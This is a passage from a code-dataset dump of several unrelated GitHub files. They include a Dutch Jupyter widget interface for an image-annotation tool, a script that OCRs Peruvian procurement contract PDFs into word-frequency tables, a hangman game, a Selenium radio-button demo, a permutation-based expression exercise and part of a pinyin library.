op ieder segment zichtbaar is\n OverlapBar = widgets.IntRangeSlider(\n value=[10, 90],\n min=0,\n max=100,\n step=1,\n continuous_update=False,\n description=\"Overlap:\",\n orientation='horizontal',\n readout=False,\n layout=widgets.Layout(width=\"300px\", justify_content=\"flex-end\"),\n )\n\n #2 functies voor het linken van het percentage overlap en de visualisatie hiervan\n @OverlapNum.observe\n def linkOverlap(PlaceHolder):\n OverlapBar.value = [OverlapNum.value, (100-OverlapNum.value)]\n \n @OverlapBar.observe\n def linkOverlap2(PlaceHolder):\n if OverlapBar.value[0]!=OverlapNum.value:\n OverlapNum.value = OverlapBar.value[0]\n else:\n OverlapNum.value = -(OverlapBar.value[1]-100)\n\n pixels = widgets.HTML(\"pixels\")\n Procent = widgets.HTML(\"procent\")\n\n #Een tussentijdse samenvoeging van widgets voor een overzichtelijker geheel\n TileSize = widgets.VBox([\n widgets.HBox([\n SizeTitel, \n Size, \n pixels\n ]), \n widgets.HBox([\n OverlapTitel, \n OverlapNum, \n Procent\n ]),\n widgets.HBox([\n OverlapBar\n ], layout=widgets.Layout(width=\"400px\", justify_content=\"flex-end\")),\n \n ])\n\n Slice = widgets.Button(\n value=False,\n description=\"Slice\",\n button_style=\"success\",\n layout=widgets.Layout(width=\"80px\"),\n )\n\n Orden = widgets.Button(\n value=False,\n description=\"Orden\",\n button_style=\"success\",\n layout=widgets.Layout(width=\"80px\"),\n )\n \n #Functie voor het aanroepen en afronden van de functies voor het ordenen of segmenteren van foto's\n def run(Button):\n #Maakt een eindscherm voor het infomeren over de nieuwe folder locaties\n ImageLocation = os.path.join(Q_UIparts.ProjectPicker.value, f\"Data\\\\Annoteren\\\\{Q_UIparts.DataNaamInput.value}\\\\images\")\n LabelLocation = os.path.join(Q_UIparts.ProjectPicker.value, f\"Data\\\\Annoteren\\\\{Q_UIparts.DataNaamInput.value}\\\\labels\")\n SuccesScherm = widgets.HTML(\n value=f\"\"\"\n \n\n Succes! \n \n \n Foto's: \n {ImageLocation} \n \n \n Labels: \n {LabelLocation} \n \n \"\"\"\n )\n\n #If functie die probeert het ordenen/segmenteren te starten. Als dit niet lukt genereert het een ergercode naast de slice/orden knop.\n if Q_UIparts.ImagePick.selected and Q_UIparts.DataNaamInput.value and Q_UIparts.ProjectPicker.value and Button == \"Slice\":\n dirs_to_create = [ImageLocation, LabelLocation]\n for dir in dirs_to_create:\n if not os.path.exists(dir):\n os.makedirs(dir)\n\n ViewCompleet.close()\n FotoSegmentatie(\n ImageMap=Q_UIparts.ImagePick.value,\n Output=ImageLocation,\n Size=int(Size.value),\n Overlap=int(Size.value * (OverlapNum.value / 100)),\n )\n display(SuccesScherm)\n \n elif Q_UIparts.ImagePick.selected and Q_UIparts.DataNaamInput.value and Q_UIparts.ProjectPicker.value and Button == \"Orden\":\n dirs_to_create = [ImageLocation, LabelLocation]\n for dir in dirs_to_create:\n if not os.path.exists(dir):\n os.makedirs(dir)\n\n ViewCompleet.close()\n FotoOrdening(\n ImageMap=Q_UIparts.ImagePick.value,\n LabelMap=Q_UIparts.LabelPick.selected, \n OutputImage=ImageLocation,\n OutputLabels=LabelLocation\n )\n display(SuccesScherm)\n elif not Q_UIparts.ImagePick.selected:\n ErrorCode.value = \"\"\"\n \n Folder met foto's niet geselecteerd. Zorg ervoor dat je op select drukt na het kiezen van een folder om je selectie te bevestigen. \n
\n \"\"\"\n elif not Q_UIparts.ProjectPicker.value:\n ErrorCode.value = \"\"\"\n \n Er is geen Project geselecteerd. Zorg ervoor dat je op Maak drukt als je een nieuwe project wil maken/gebruiken. \n
\n \"\"\"\n else:\n ErrorCode.value = \"\"\"\n \n Er is geen naam opgegeven voor de nieuwe dataset. \n
\n \"\"\"\n \n #2 functies voor het aanropen van de functie hierboven. Dit is losgetrokken zodat een extra variabele meegegeven kan worden.\n @Slice.on_click\n def RunSlice(PlaceHolder):\n run(\"Slice\")\n\n @Orden.on_click\n def RunOrden(PlaceHolder):\n run(\"Orden\")\n\n #Voegt alle widgets samen tot een samenhangende Interface \n line = widgets.HTML(value=\" \")\n ErrorCode = widgets.HTML()\n\n Box1 = widgets.VBox([Q_UIparts.ProjectInterface, DataNaamTitel, Q_UIparts.DataNaamInput])\n Box2SM = widgets.VBox([ImagePickTitelSM, Q_UIparts.ImagePick, TileSize])\n Box2OR = widgets.VBox([ImagePickTitelOR, Q_UIparts.ImagePick, LabelPickTitel, Q_UIparts.LabelPick])\n\n ViewSM = widgets.VBox([\n widgets.HBox([\n Box1,\n Box2SM,\n ], layout=widgets.Layout(justify_content=\"space-around\")\n ),\n line,\n widgets.HBox([\n ErrorCode,\n Slice,\n ], layout=widgets.Layout(justify_content=\"flex-end\")\n )], layout=widgets.Layout(width=\"888px\")\n )\n\n ViewOR = widgets.VBox([\n widgets.HBox([\n Box1,\n Box2OR,\n ], layout=widgets.Layout(justify_content=\"space-around\")\n ),\n line,\n widgets.HBox([\n ErrorCode, \n Orden\n ], layout=widgets.Layout(justify_content=\"flex-end\")\n )], layout=widgets.Layout(width=\"888px\"),\n )\n\n ViewCompleet = widgets.Tab(layout= widgets.Layout(width='920px'))\n ViewCompleet.children = [ViewSM, ViewOR]\n ViewCompleet.titles = ('Foto segmentatie', 'Foto herordening')\n\n display(ViewCompleet)\n","repo_name":"FishingBehindTheNet/AiAssist-AnnotatieTool","sub_path":"Modules/A1_FotoPreparatie.py","file_name":"A1_FotoPreparatie.py","file_ext":"py","file_size_in_byte":11543,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"40205349591","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 3 01:31:38 2021\r\n\r\n@author: tooru\r\n\"\"\"\r\n\r\n# Import libraries \r\nfrom PIL import Image \r\nimport pytesseract \r\nimport sys \r\nimport os\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\nimport pandas as pd\r\nimport numpy as np\r\nimport re\r\n\r\nfrom pdf2image import convert_from_path \r\nimport os \r\n\r\nimport urllib.request\r\n\r\nimport collections, re\r\nimport nltk\r\nfrom nltk.corpus import stopwords # Import the stop word list\r\n\r\nfrom datetime import datetime\r\nstartTime = datetime.now()\r\n \r\n# Path of packages \r\npop_path = r'...\\poppler-0.68.0\\bin' \r\n# Poppler = http://blog.alivate.com.au/poppler-windows/\r\npytesseract.pytesseract.tesseract_cmd = r'...\\tesseract.exe'\r\n# Pytesseract = https://github.com/UB-Mannheim/tesseract/wiki\r\n\r\npath = r'D:\\HatunData\\pdf_ocr'\r\n\r\npath_data = path + r'\\data\\\\' \r\npath_pdf = path + r'\\pdf\\\\' \r\npath_txt = path + r'\\text\\\\'\r\npath_tmp = path + r'\\temp\\\\'\r\n\r\n'''\r\n A. Maestros \r\n'''\r\n\r\nimport chardet\r\n\r\n#https://www.sunat.gob.pe/descargaPRR/mrc137_padron_reducido.html\r\nwith open(join(path_data,'padron_reducido_local_anexo.txt'), 'rb') as rawdata:\r\n encoding = chardet.detect(rawdata.read(10000)).get(\"encoding\")\r\nprint(encoding)\r\n\r\npadron_reducido = pd.read_csv(join(path_data,'padron_reducido_local_anexo.txt'), sep= '|', encoding='ISO-8859-1', dtype=object)\r\ntry: \r\n padron_reducido = padron_reducido[[' RUC','UBIGEO']]\r\nexcept:\r\n padron_reducido = padron_reducido[['RUC','UBIGEO']]\r\n\r\npadron_reducido.columns = ['RUC_PROVEEDOR', 'UBIGEO_PROVEEDOR']\r\npadron_reducido.sort_values(['RUC_PROVEEDOR', 'UBIGEO_PROVEEDOR'], inplace = True)\r\npadron_reducido = padron_reducido.drop_duplicates(subset = 'RUC_PROVEEDOR', keep='first')\r\n\r\nentidades = pd.read_excel(join(path_data,'CONOSCE_CONVOCATORIAS2021_0.xlsx'), skiprows=1)\r\nentidades = entidades[['CODIGOENTIDAD', 'ENTIDAD_RUC', 'ENTIDAD', 'TIPOENTIDAD','SECTOR']]\r\nentidades = entidades.drop_duplicates()\r\n\r\n'''\r\n X. PDF download from conosce-contratos url \r\n'''\r\n#http://bi.seace.gob.pe/pentaho/api/repos/:public:portal:datosabiertos.html/content?userid=public&password=key\r\ndf = pd.read_excel(join(path_data,'CONOSCE_CONTRATOS2021_0.xlsx'), skiprows=1)\r\ndf = df.rename(columns={'DOC_URL': 'URLCONTRATO'})\r\ndf['INDEX'] = df['URLCONTRATO'].str.replace('http://contratos.seace.gob.pe:9045/api/documentos/descargar/','')\r\n\r\nmerge_df = df\r\nmerge_df = pd.merge(merge_df, entidades, left_on='CODIGOENTIDAD' , right_on='CODIGOENTIDAD', how='left')\r\nmerge_df = pd.merge(merge_df, padron_reducido, left_on='RUC_CONTRATISTA' , right_on='RUC_PROVEEDOR', how='left')\r\n\r\nmerge_df.to_excel(join(path_data,'BDA_CONTRATOS_V4.xlsx') , index = False)\r\n\r\ndel merge_df\r\ndel padron_reducido\r\ndel entidades\r\n\r\n'''\r\n I. PDF download from conosce-contratos url \r\n'''\r\n\r\ndata_list = df['URLCONTRATO'].tolist()\r\ndel df\r\n\r\n\r\npdf_list = [join(path_pdf,i) for i in listdir(path_pdf)]\r\npdf_list = [w.replace('.pdf', '') for w in pdf_list]\r\npdf_list = [w.replace(path_pdf, 'http://contratos.seace.gob.pe:9045/api/documentos/descargar/') for w in pdf_list]\r\n\r\n#Lista de files que faltan descargar\r\ntodownload_list = set(data_list) - set(pdf_list)\r\ntodownload_list = list(todownload_list)\r\n\r\nprint(datetime.now() - startTime)\r\nprint('Start download')\r\n\r\na = 0\r\nfor i in todownload_list:\r\n a = a + 1\r\n print(a)\r\n pdf_name = i.rsplit('/', 1)[-1]\r\n print(i)\r\n try:\r\n urllib.request.urlretrieve(i, path_pdf + str(pdf_name) + '.pdf')\r\n print('download iter - ' + str(a) )\r\n print(path_pdf + str(pdf_name)+ '.pdf')\r\n except:\r\n print('failed download iter ' + str(a) + '- file - ' + str(pdf_name))\r\n \r\n print(datetime.now() - startTime)\r\n print('Corr of iter download - ' + str(a))\r\n\r\n\r\n'''\r\n II. PDF to JPG to TXT\r\n'''\r\n\r\nos.chdir(path_tmp)\r\n\r\npdf_list = [join(path_pdf,i) for i in listdir(path_pdf)]\r\npdf_list = [w.replace(path_pdf, '') for w in pdf_list]\r\npdf_list = [w.replace('.pdf', '') for w in pdf_list]\r\n\r\nparsed_list = [join(path_txt,i) for i in listdir(path_txt)]\r\nparsed_list = [w.replace(path_txt, '') for w in parsed_list]\r\nparsed_list = [w.replace('.txt', '') for w in parsed_list]\r\n\r\n#Lista de files que faltan parsear\r\ndiff_list = set(pdf_list) - set(parsed_list)\r\ndiff_list = list(diff_list)\r\n\r\nnum_file = 0\r\nfor file in diff_list:\r\n num_file = num_file + 1\r\n PDF_file = path_pdf + file + '.pdf'\r\n outfile = path_txt + file + '.txt' \r\n \r\n try:\r\n \r\n ''' \r\n Part #1 : Converting PDF to images \r\n '''\r\n \r\n # Store all the pages of the PDF in a variable \r\n pages = convert_from_path(PDF_file, 500, poppler_path = pop_path) \r\n \r\n # Counter to store images of each page of PDF to image \r\n image_counter = 1\r\n \r\n # Iterate through all the pages stored above \r\n for page in pages: \r\n \r\n # Declaring filename for each page of PDF as JPG \r\n filename = \"page_\"+str(image_counter)+\".jpg\"\r\n \r\n # Save the image of the page in system \r\n page.save(filename, 'JPEG') \r\n \r\n # Increment the counter to update filename \r\n image_counter = image_counter + 1\r\n \r\n print('success to JPG - ' + str(image_counter))\r\n\r\n ''' \r\n Part #2 - Recognizing text from the images using OCR \r\n '''\r\n \r\n # Variable to get count of total number of pages \r\n filelimit = image_counter-1\r\n \r\n # Open the file in append mode so that \r\n # All contents of all images are added to the same file \r\n f = open(outfile, \"a\") \r\n \r\n # Iterate from 1 to total number of pages \r\n for i in range(1, filelimit + 1): \r\n \r\n # Set filename to recognize text from \r\n filename = \"page_\"+str(i)+\".jpg\"\r\n \r\n # Recognize the text as string in image using pytesserct \r\n text = str(((pytesseract.image_to_string(Image.open(filename))))) \r\n \r\n text = text.replace('-\\n', '') \r\n \r\n # Finally, write the processed text to the file. \r\n f.write(text) \r\n print('success to tesseract')\r\n \r\n # Close the file after writing all the text. \r\n f.close() \r\n print('success conversion')\r\n except:\r\n print('failed conversion')\r\n \r\n \r\n print('######### Filename: ' + str(file))\r\n print('######### script time - iter ' + str(num_file))\r\n print(outfile)\r\n print(datetime.now() - startTime)\r\n \r\n\r\n\r\n'''\r\n III. TXT to structured dataframe\r\n'''\r\n\r\ntxt_list = [join(path_txt,i) for i in listdir(path_txt)]\r\ntxt_list = [w.replace(path_txt, '') for w in txt_list]\r\ntxt_list = [w.replace('.txt', '') for w in txt_list] \r\n \r\ndf_bow_append = pd.DataFrame()\r\n\r\nnum_file = 0\r\nfor file in txt_list:\r\n outfile = path_txt + file + '.txt' \r\n print(outfile)\r\n \r\n try:\r\n df = pd.read_fwf(outfile, dtype=object, header=None)\r\n list_columns = df.columns\r\n df['file_name'] = file \r\n df['columna_unica'] = ''\r\n for i in list_columns:\r\n print(i)\r\n df['columna_unica'] = df['columna_unica'].fillna('') + ' ' + df[i].fillna('')\r\n \r\n df['columna_unica'] = df['columna_unica'].str.upper()\r\n df['columna_unica'] = df['columna_unica'].str.replace('[^a-zA-Z0-9]', ' ')\r\n df['columna_unica'] = df['columna_unica'].str.strip()\r\n df['columna_unica'] = df['columna_unica'].str.replace(' ', ' ')\r\n df['columna_unica'] = df['columna_unica'].str.replace(' ', ' ')\r\n \r\n \r\n df = df[['file_name', 'columna_unica']]\r\n df = df.query('(columna_unica != \"\")')\r\n \r\n #https://countwordsfree.com/stopwords/spanish\r\n stop_words = [\"ALGÚN\",\"ALGUNA\",\"ALGUNAS\",\"ALGUNO\",\"ALGUNOS\",\"AMBOS\",\"AMPLEAMOS\",\"ANTE\",\"ANTES\",\"AQUEL\",\r\n \"AQUELLAS\",\"AQUELLOS\",\"AQUI\",\"ARRIBA\",\"ATRAS\",\"BAJO\",\"BASTANTE\",\"BIEN\",\"CADA\",\"CIERTA\",\r\n \"CIERTAS\",\"CIERTO\",\"CIERTOS\",\"COMO\",\"CON\",\"CONSEGUIMOS\",\"CONSEGUIR\",\"CONSIGO\",\"CONSIGUE\",\r\n \"CONSIGUEN\",\"CONSIGUES\",\"CUAL\",\"CUANDO\",\"DENTRO\",\"DESDE\",\"DONDE\",\"DOS\",\"EL\",\"ELLAS\",\"ELLOS\",\r\n \"EMPLEAIS\",\"EMPLEAN\",\"EMPLEAR\",\"EMPLEAS\",\"EMPLEO\",\"EN\",\"ENCIMA\",\"ENTONCES\",\"ENTRE\",\"ERA\",\r\n \"ERAMOS\",\"ERAN\",\"ERAS\",\"ERES\",\"ES\",\"ESTA\",\"ESTABA\",\"ESTADO\",\"ESTAIS\",\"ESTAMOS\",\"ESTAN\",\"ESTOY\",\r\n \"FIN\",\"FUE\",\"FUERON\",\"FUI\",\"FUIMOS\",\"GUENO\",\"HA\",\"HACE\",\"HACEIS\",\"HACEMOS\",\"HACEN\",\"HACER\",\"HACES\",\"HAGO\",\r\n \"INCLUSO\",\"INTENTA\",\"INTENTAIS\",\"INTENTAMOS\",\"INTENTAN\",\"INTENTAR\",\"INTENTAS\",\"INTENTO\",\"IR\",\"LA\",\"LARGO\",\r\n \"LAS\",\"LO\",\"LOS\",\"MIENTRAS\",\"MIO\",\"MODO\",\"MUCHOS\",\"MUY\",\"NOS\",\"NOSOTROS\",\"OTRO\",\"PARA\",\"PERO\",\"PODEIS\",\r\n \"PODEMOS\",\"PODER\",\"PODRIA\",\"PODRIAIS\",\"PODRIAMOS\",\"PODRIAN\",\"PODRIAS\",\"POR\",\"POR QUÉ\",\"PORQUE\",\"PRIMERO\",\r\n \"PUEDE\",\"PUEDEN\",\"PUEDO\",\"QUIEN\",\"SABE\",\"SABEIS\",\"SABEMOS\",\"SABEN\",\"SABER\",\"SABES\",\"SER\",\"SI\",\"SIENDO\",\r\n \"SIN\",\"SOBRE\",\"SOIS\",\"SOLAMENTE\",\"SOLO\",\"SOMOS\",\"SOY\",\"SU\",\"SUS\",\"TAMBIÉN\",\"TENEIS\",\"TENEMOS\",\"TENER\",\r\n \"TENGO\",\"TIEMPO\",\"TIENE\",\"TIENEN\",\"TODO\",\"TRABAJA\",\"TRABAJAIS\",\"TRABAJAMOS\",\"TRABAJAN\",\"TRABAJAR\",\"TRABAJAS\",\"TRABAJO\",\r\n \"TRAS\",\"TUYO\",\"ULTIMO\",\"UN\",\"UNA\",\"UNAS\",\"UNO\",\"UNOS\",\"USA\",\"USAIS\",\"USAMOS\",\"USAN\",\"USAR\",\"USAS\",\"USO\",\"VA\",\"VAIS\",\r\n \"VALOR\",\"VAMOS\",\"VAN\",\"VAYA\",\"VERDAD\",\"VERDADERA\",\"VERDADERO\",\"VOSOTRAS\",\"VOSOTROS\",\"VOY\",\"YO\",\"ÉL\",\r\n \"ÉSTA\",\"ÉSTAS\",\"ÉSTE\",\"ÉSTOS\",\"ÚLTIMA\",\"ÚLTIMAS\",\"ÚLTIMO\",\"ÚLTIMOS\",\"A\",\"AÑADIÓ\",\"AÚN\",\"ACTUALMENTE\",\"ADELANTE\",\r\n \"ADEMÁS\",\"AFIRMÓ\",\"AGREGÓ\",\"AHÍ\",\"AHORA\",\"AL\",\"ALGO\",\"ALREDEDOR\",\"ANTERIOR\",\"APENAS\",\"APROXIMADAMENTE\",\"AQUÍ\",\"ASÍ\",\r\n \"ASEGURÓ\",\"AUNQUE\",\"AYER\",\"BUEN\",\"BUENA\",\"BUENAS\",\"BUENO\",\"BUENOS\",\"CÓMO\",\"CASI\",\"CERCA\",\"CINCO\",\"COMENTÓ\",\"CONOCER\",\r\n \"CONSIDERÓ\",\"CONSIDERA\",\"CONTRA\",\"COSAS\",\"CREO\",\"CUALES\",\"CUALQUIER\",\"CUANTO\",\"CUATRO\",\"CUENTA\",\"DA\",\"DADO\",\"DAN\",\"DAR\",\r\n \"DE\",\"DEBE\",\"DEBEN\",\"DEBIDO\",\"DECIR\",\"DEJÓ\",\"DEL\",\"DEMÁS\",\"DESPUÉS\",\"DICE\",\"DICEN\",\"DICHO\",\"DIERON\",\"DIFERENTE\",\"DIFERENTES\",\r\n \"DIJERON\",\"DIJO\",\"DIO\",\"DURANTE\",\"E\",\"EJEMPLO\",\"ELLA\",\"ELLO\",\"EMBARGO\",\"ENCUENTRA\",\"ESA\",\"ESAS\",\"ESE\",\"ESO\",\"ESOS\",\r\n \"ESTÁ\",\"ESTÁN\",\"ESTABAN\",\"ESTAR\",\"ESTARÁ\",\"ESTAS\",\"ESTE\",\"ESTO\",\"ESTOS\",\"ESTUVO\",\"EX\",\"EXISTE\",\"EXISTEN\",\"EXPLICÓ\",\r\n \"EXPRESÓ\",\"FUERA\",\"GRAN\",\"GRANDES\",\"HABÍA\",\"HABÍAN\",\"HABER\",\"HABRÁ\",\"HACERLO\",\"HACIA\",\"HACIENDO\",\"HAN\",\"HASTA\",\"HAY\",\"HAYA\",\r\n \"HE\",\"HECHO\",\"HEMOS\",\"HICIERON\",\"HIZO\",\"HOY\",\"HUBO\",\"IGUAL\",\"INDICÓ\",\"INFORMÓ\",\"JUNTO\",\"LADO\",\"LE\",\"LES\",\"LLEGÓ\",\r\n \"LLEVA\",\"LLEVAR\",\"LUEGO\",\"LUGAR\",\"MÁS\",\"MANERA\",\"MANIFESTÓ\",\"MAYOR\",\"ME\",\"MEDIANTE\",\"MEJOR\",\"MENCIONÓ\",\"MENOS\",\r\n \"MI\",\"MISMA\",\"MISMAS\",\"MISMO\",\"MISMOS\",\"MOMENTO\",\"MUCHA\",\"MUCHAS\",\"MUCHO\",\"NADA\",\"NADIE\",\"NI\",\r\n \"NINGÚN\",\"NINGUNA\",\"NINGUNAS\",\"NINGUNO\",\"NINGUNOS\",\"NO\",\"NOSOTRAS\",\"NUESTRA\",\"NUESTRAS\",\"NUESTRO\",\"NUESTROS\",\r\n \"NUEVA\",\"NUEVAS\",\"NUEVO\",\"NUEVOS\",\"NUNCA\",\"O\",\"OCHO\",\"OTRA\",\"OTRAS\",\"OTROS\",\"PARECE\",\"PARTE\",\"PARTIR\",\"PASADA\",\"PASADO\",\r\n \"PESAR\",\"POCA\",\"POCAS\",\"POCO\",\"POCOS\",\"PODRÁ\",\"PODRÁN\",\"PODRÍA\",\"PODRÍAN\",\"PONER\",\"POSIBLE\",\"PRÓXIMO\",\"PRÓXIMOS\",\r\n \"PRIMER\",\"PRIMERA\",\"PRIMEROS\",\"PRINCIPALMENTE\",\"PROPIA\",\"PROPIAS\",\"PROPIO\",\"PROPIOS\",\"PUDO\",\"PUEDA\",\"PUES\",\"QUÉ\",\"QUE\",\r\n \"QUEDÓ\",\"QUEREMOS\",\"QUIÉN\",\"QUIENES\",\"QUIERE\",\"REALIZÓ\",\"REALIZADO\",\"REALIZAR\",\"RESPECTO\",\"SÍ\",\"SÓLO\",\"SE\",\"SEÑALÓ\",\r\n \"SEA\",\"SEAN\",\"SEGÚN\",\"SEGUNDA\",\"SEGUNDO\",\"SEIS\",\"SERÁ\",\"SERÁN\",\"SERÍA\",\"SIDO\",\"SIEMPRE\",\"SIETE\",\"SIGUE\",\"SIGUIENTE\",\"SINO\",\r\n \"SOLA\",\"SOLAS\",\"SOLOS\",\"SON\",\"TAL\",\"TAMPOCO\",\"TAN\",\"TANTO\",\"TENÍA\",\"TENDRÁ\",\"TENDRÁN\",\"TENGA\",\"TENIDO\",\"TERCERA\",\r\n \"TODA\",\"TODAS\",\"TODAVÍA\",\"TODOS\",\"TOTAL\",\"TRATA\",\"TRAVÉS\",\"TRES\",\"TUVO\",\"USTED\",\"VARIAS\",\"VARIOS\",\"VECES\",\r\n \"VER\",\"VEZ\",\"Y\",\"YA\",\r\n \"DE\"]\r\n \r\n #cu_wo_sw: Columna Unica Without StopWords\r\n df['cu_wo_sw'] = df['columna_unica']\r\n df['cu_wo_sw'] = [' '.join([item for item in x.split() \r\n if item not in stop_words]) \r\n for x in df['columna_unica']]\r\n \r\n df['line_text'] = range(1, len(df) + 1)\r\n \r\n #Bag of words\r\n df_bow = collections.Counter([y for x in df.cu_wo_sw.values.flatten() for y in x.split()])\r\n df_bow = pd.DataFrame.from_dict(df_bow, orient='index')\r\n df_bow.reset_index(level=0, inplace=True)\r\n df_bow.columns = ['bow' , 'freq']\r\n df_bow['file_name'] = file\r\n df_bow['len'] = df_bow['bow'].str.len()\r\n \r\n \r\n df_bow_append = df_bow_append.append(df_bow)\r\n del df\r\n del df_bow\r\n \r\n except:\r\n print('Error parsing txt')\r\n \r\ndf_bow_append.to_excel(join(path_data,'bow_contratos.xlsx') , index = False)\r\n \r\n","repo_name":"Tooruogata/Conosce_PDF_OCR_BOW","sub_path":"conosce_pdf_bagwords_G.py","file_name":"conosce_pdf_bagwords_G.py","file_ext":"py","file_size_in_byte":13492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"27697449464","text":"# HANGMAN 4 --- Keeping track of the lives\n\nimport random \n\nstages = ['''\n +---+\n | |\n O |\n /|\\ |\n / \\ |\n |\n=========\n''', '''\n +---+\n | |\n O |\n /|\\ |\n / |\n |\n=========\n''', '''\n +---+\n | |\n O |\n /|\\ |\n |\n |\n=========\n''', '''\n +---+\n | |\n O |\n /| |\n |\n |\n=========''', '''\n +---+\n | |\n O |\n | |\n |\n |\n=========\n''', '''\n +---+\n | |\n O |\n |\n |\n |\n=========\n''', '''\n +---+\n | |\n |\n |\n |\n |\n=========\n''']\n\nword_list = [\"ardvark\", \"baboon\", \"camel\"]\nchosen_word = random.choice(word_list)\n\nlives = 6\n\n\n# Testing code\nprint(f\"pssst, the word is {chosen_word}\")\n\n# create empty list called display\ndisplay = []\n\n# replace each letter in chosen_word with a blank \n# inserted into the display list\nword_len = len(chosen_word)\nfor _ in range(word_len):\n display += \"_\"\n# print(display)\n\n# user to guess a letter\n\nend_of_game = False\nwhile not end_of_game:\n guess = input(\"Guess a letter: \").lower()\n\n # looping through each position in the chosen_word \n # if the letter matches guess at that position, then the guess should \n # displayed removing the blank at that position\n\n for position in range(word_len):\n # if chosen_word[position] == guess:\n # display[position] = guess. OR\n letter = chosen_word[position]\n if letter == guess:\n display[position] = letter\n \n # for guess not in letter, the lives get reduced\n if guess not in chosen_word:\n lives -= 1\n if lives == 0:\n end_of_game = True\n print(\"You Lose\")\n # joining all the elements in the list and turn it to a string\n print(f\"{''.join(display)}\")\n\n if \"_\" not in display:\n end_of_game = True\n print(\"You Win\")\n\n print(stages[lives])\n","repo_name":"dhayomax/Python","sub_path":"beginner level/hangman4.py","file_name":"hangman4.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"40869179596","text":"import time\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\n\ndriver_path = r\"C:\\Users\\akshay.nv\\Downloads\\chromedriver-win64\\chromedriver-win64\\chromedriver.exe\"\nservice = Service(driver_path)\ndriver = webdriver.Chrome(service=service)\ndriver.get(\"https://www.rahulshettyacademy.com/AutomationPractice/\")\nradiobuttons = driver.find_elements(By.CSS_SELECTOR, \".radioButton\")\nradiobuttons[2].click()\nassert radiobuttons[2].is_selected()\n\nassert driver.find_element(By.ID, \"displayed-text\").is_displayed()\ndriver.find_element(By.ID, \"hide-textbox\").click()\nassert not driver.find_element(By.ID, \"displayed-text\").is_displayed()\n\n\n#for radiobutton in radiobuttons:\n # if radiobutton.get_attribute('value') == \"radio2\":\n # radiobutton.click()\n # assert radiobutton.is_selected()\n # break\ntime.sleep(4)","repo_name":"Akshay507/GetDmeo","sub_path":"Selenium/Demo7_rediobutton.py","file_name":"Demo7_rediobutton.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"44290375460","text":"from itertools import permutations\n\n\ndef operation(num1, num2, op):\n if op == '+':\n return str(int(num1) + int(num2))\n if op == '-':\n return str(int(num1) - int(num2))\n if op == '*':\n return str(int(num1) * int(num2))\n\n\ndef calculate(expression, op):\n array = []\n temp = \"\"\n\n # 문자열에서 연산자와 숫자 분리\n for i in expression:\n # print('temp = {}, i = {}, i.isdigit = {}'.format(temp, i, i.isdigit()))\n if i.isdigit():\n temp += i\n else:\n array.append(temp)\n array.append(i)\n temp = \"\"\n array.append(temp)\n\n # 연산자 루프\n for o in op:\n stack = []\n while len(array) != 0:\n temp = array.pop(0)\n if temp == o:\n stack.append(operation(stack.pop(), array.pop(0), o))\n else:\n stack.append(temp)\n array = stack\n\n return abs(int(array[0]))\n\n\ndef solution(expression):\n # 조합식 리스트 만들기\n op = list(permutations(['+', '-', '*'], 3))\n print('op = {}'.format(op))\n result = []\n # 만들어진 조합식 리스트 만큼 계산\n for i in op:\n result.append(calculate(expression, i))\n return max(result)\n\n# expect 60420\nprint(solution(\"100-200*300-500+20\"))\n# expect 300\nprint(solution(\"50*6-3*2\"))","repo_name":"Slowth-KIM/crewcrew-coding-test-study","sub_path":"박은우/카카오기출문제/수식 최대화.py","file_name":"수식 최대화.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"}
+{"seq_id":"70037863556","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nimport os\nimport re\n\nfrom enum import IntEnum, unique\n\nfrom gupinyin import pinyin_dict\nfrom gupinyin import phrases_dict\nfrom gupinyin.compat import SUPPORT_UCS4\n\n# 词语拼音库\nPHRASES_DICT = phrases_dict.phrases_dict\n\n# 单字拼音库\nPINYIN_DICT = pinyin_dict.pinyin_dict\n\n# 利用环境变量控制不做copy操作(无自定义拼音库的情况), 以减少内存使用\nif not os.environ.get('GUPINYIN_NO_DICT_COPY'):\n PINYIN_DICT = PINYIN_DICT.copy()\n PHRASES_DICT = PHRASES_DICT.copy()\n\n# 匹配使用数字标识声调的字符的正则表达式\nRE_TONE2 = re.compile(r'([aeoiuvnm])([1-4])$')\n\n# 有拼音的汉字\nif SUPPORT_UCS4:\n RE_HANS = re.compile(\n r'^(?:['\n r'\\u3007' # 〇\n r'\\u3400-\\u4dbf' # CJK扩展A:[3400-4DBF]\n r'\\u4e00-\\u9fff' # CJK基本:[4E00-9FFF]\n r'\\uf900-\\ufaff' # CJK兼容:[F900-FAFF]\n r'\\U00020000-\\U0002A6DF' # CJK扩展B:[20000-2A6DF]\n r'\\U0002A703-\\U0002B73F' # CJK扩展C:[2A700-2B73F]\n r'\\U0002B740-\\U0002B81D' # CJK扩展D:[2B740-2B81D]\n r'\\U0002F80A-\\U0002FA1F' # CJK兼容扩展:[2F800-2FA1F]\n r'])+$'\n )\nelse:\n RE_HANS = re.compile( # pragma: no cover\n r'^(?:['\n r'\\u3007' # 〇\n r'\\u3400-\\u4dbf' # CJK扩展A:[3400-4DBF]\n r'\\u4e00-\\u9fff' # CJK基本:[4E00-9FFF]\n r'\\uf900-\\ufaff' # CJK兼容:[F900-FAFF]\n r'])+$'\n )\n\n\n@unique\nclass Style(IntEnum):\n \"\"\"拼音风格\"\"\"\n\n #: 普通风格,不带声调。如: 中国 -> ``zhong guo``\n NORMAL = 0\n #: 标准声调风格,拼音声调在韵母第一个字母上(默认风格)。如: 中国 -> ``zhōng guó``\n #: 声调风格2,即拼音声调在各个韵母之后,用数字 [1-4] 进行表示。如: 中国 -> ``zho1ng guo2``\n #: 声调风格3,即拼音声调在各个拼音之后,用数字 [1-4] 进行表示。如: 中国 -> ``zhong1 guo2``\n #: 